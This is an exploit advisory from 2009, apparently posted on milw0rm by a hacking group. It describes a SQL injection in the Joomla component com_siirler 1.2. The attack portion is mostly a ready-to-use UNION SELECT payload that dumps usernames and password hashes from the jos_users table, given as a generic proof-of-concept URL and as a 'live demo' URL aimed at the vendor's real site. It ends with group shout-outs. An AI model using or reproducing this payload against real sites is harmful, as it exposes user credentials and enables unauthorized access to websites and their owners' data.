+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ | | | Joomla <= 1.5.x Component com_siirler 1.2 (sid) SQL Injection Vulnerability | | | | | | =================[Author]================== | | | | [+] Founded : v3n0m | | [+] Contact : v3n0m666[at]live[dot]com | | [+] Blog : http://0wnage.wordpress.com/ | | [+] Group : YOGYACARDERLINK | | [+] Site : http://yogyacarderlink.web.id/ | | [+] Date : August, 25th 2009 [INDONESIA] | | | | ================[Soft Info]================ | | | | Software: Siirler Bileseni | | Version : 1.2 RC (Legacy) | | Vendor : http://www.qproje.com/ | | License : GNU/GPL | | | +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [-] Exploit: [+] +and+1=2+union+select+concat(username,char(58),password)+from+jos_users-- [-] SQLi p0c: [+] http://localhost/[path]/index.php?option=com_siirler&task=sdetay&sid=[xxx]+and+1=2+union+select+concat(username,char(58),password)+from+jos_users-- [xxx] = Valid sid number [+] Demo Live: [-] http://demo.qproje.com/j15x/index.php?option=com_siirler&task=sdetay&sid=364+and+1=2+union+select+concat(username,char(58),password)+from+jos_users-- =========================== [+] Greetz & Thanks [+] =========================== RedLine Crew : Bang Musa,Mas Andre,Dagol,Yazid,Ogie YOGYACARDERLINK : leQhi,lingah,-Jali,Anak_Naga_,g0nz,IdioT_InsidE, aRiee,yoga0400,ghareng,eidelweiss,pKi,kaka11 g0t inspiration in my bedroom when i was flashback my mind about jogja & jovita PROUD TO BE INDONESIAN- # milw0rm.com [2009-08-25]